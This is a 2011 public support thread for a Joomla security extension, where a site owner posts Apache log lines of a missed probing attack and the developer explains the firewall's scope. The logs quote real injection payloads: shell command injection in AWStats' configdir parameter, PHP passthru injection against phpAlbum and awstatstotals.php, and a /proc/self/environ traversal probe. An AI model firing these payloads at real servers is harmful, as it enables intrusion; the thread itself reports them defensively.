Support

Admin Tools

#10160 missed attack attemp

Posted in ‘Admin Tools for Joomla! 4 & 5’
This is a public ticket

Everybody will be able to see its contents. Do not include usernames, passwords or any other sensitive information.

Environment Information

Joomla! version
n/a
PHP version
n/a
Admin Tools version
n/a

Latest post by nicholas on Saturday, 17 December 2011 17:26 CST

Saturday, 17 December 2011 16:34 CST

user53260
I've checked my Apache logs and found a suspicious activity, which is most probably a hack attempt. This one was not trigged by the firewall.

Previous 2 attempts (from other IPs, but with the same patten/tries) were cacheted by firewall, but only 1 time (MUA Shield, URL looks like "?file=../../../../../../proc/self/environ").

The 3 attempt below didn't have that attack (MUA Shield), and was not logged by firewall. I found because Joomla redirect component recorded 404 error.

82.228.250.163 - - [17/Dec/2011:18:58:18 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:19 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.0" 404 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:19 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:21 +0200] "GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:27 +0200] "GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:28 +0200] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:28 +0200] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:29 +0200] "GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:29 +0200] "GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:36 +0200] "GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:36 +0200] "GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:37 +0200] "GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0" 404 4654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:51 +0200] "GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0" 404 4654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:54 +0200] "GET /main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0" 404 4648 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:56 +0200] "GET /phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0" 404 4654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:58 +0200] "GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0" 404 4654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:59:04 +0200] "GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0" 404 4648 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:59:26 +0200] "GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0" 404 4654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"

Saturday, 17 December 2011 16:47 CST

nicholas
Web Application Firewall is part of Admin Tools Professional which is a Joomla! component and plugin combination. As such, it only runs when a Joomla! URL is being loaded by the web server. Look at the URLs you posted. They are accessing AWStats, a PERL script running on your server. Your question is like asking "Why doesn't my antivirus, running on my Windows machine, detect a virus on the email I opened from my Linux machine, if they are both in the same room?". You see my point, right? :)

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Saturday, 17 December 2011 17:02 CST

user53260
Sure, I see your point.
Still, Joomla core Redirect manage recored some of the attempts (not to awstats, but to the "album") with 404 errors.
In any case, it was just FYI :)

Saturday, 17 December 2011 17:26 CST

nicholas
This attack would only work if the software on your site is using eval with unfiltered input. Catching those attacks with a firewall would throw so many false positives it would be impossible to use your site. Besides, any software doing what I just described is such a huge pile of crap that can't be protected effectively by anything except an immediate uninstallation of it. There's only so much you can do to protect a site with a firewall.

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Support Information

Working hours: We are open Monday to Friday, 9am to 7pm Cyprus timezone (EET / EEST). Support is provided by the same developers writing the software, all of which live in Europe. You can still file tickets outside of our working hours, but we cannot respond to them until we're back at the office.

Support policy: We would like to kindly inform you that when using our support you have already agreed to the Support Policy which is part of our Terms of Service. Thank you for your understanding and for helping us help you!